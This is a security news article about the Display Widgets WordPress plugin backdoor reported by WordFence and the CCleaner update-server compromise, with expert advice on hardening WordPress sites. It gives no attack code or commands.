Have you checked your plugins recently?
Latest case of rogue WordPress plugin thought to have installed backdoors on up to 200,000 websites.
Hacked WordPress plugins are certainly not uncommon, and of late there has been a spate of more underhand attacks. The latest of which has apparently installed a backdoor in more than 200,000 websites.
The researchers who highlighted the problem recommend website owners remove the plugin in question - known as Display Widgets - immediately. According to IT security firm WordFence the last three releases of the plugin have contained code that allows the author to publish any content on an affected site.
Originally developed as an open-source plugin, the popular tool was sold on 21 June and the new owner immediately released an update version 2.6.0, followed by another three versions, all of which - it is alleged by WordFence - attempted variations on a theme of running malicious code. Each time the plugin was pulled from the repository by WordPress, but was then tweaked and resubmitted. The full blow-by-blow account is here.
“The authors of the plugin are actively maintaining their malicious code, switching between sources for spam and working to obfuscate (hide) the domain they are fetching spam from,” said Mark Maunder, CEO, WordFence.
Ilia Kolochenko, CEO of High-Tech Bridge, commented that even non-malicious plugins pose a significant threat to site owners and consumers: “WordPress plugins are a very well-known source of vulnerabilities. Nowadays, critical RCEs and Arbitrary File Upload flaws are quite rare, but as we can see - they still exist and complement less dangerous but more frequent XSS and SQL injections. Differently from core WordPress installation that is maintained and supported by team of professionals, third-party plugins are often abandoned or release security patches with a significant delay.
“The best way to avoid security problems with plugins would be to stop using them, but if there is no such possibility - WordPress owners shall rename or hide admin directory, implement two factor authentication (however, it won’t save from RCE) and hide admin panel. A simple WAF can be also a very good idea (however, it will not help against advanced vectors of XSS). Obviously, core WP installation and all updatable plugins shall be maintained up to date.”
Of course, while many non-WordPress applications have critical vulnerabilities baked in anyway, the technique of hijacking trusted plugins or platforms to deliver malware is growing in popularity.
Just a few days ago anti-malware tool CCleaner was compromised and more than two million users unwittingly installed malware when Piriform, the developer of CCleaner now owned by security firm Avast had its update server somehow compromised. The company said that at some point between 15 August, when it released version v5.33.6162 of the software, and 12 September, when it updated servers with a new version, a trojan was loaded into the download package.
The company claims “The threat has now been resolved”, and that investigations are ongoing, but the incident will doubtless concern the 2.27m users who trusted the anti-malware tool. In short, blind trust is a dangerous thing in software terms, whoever the vendor...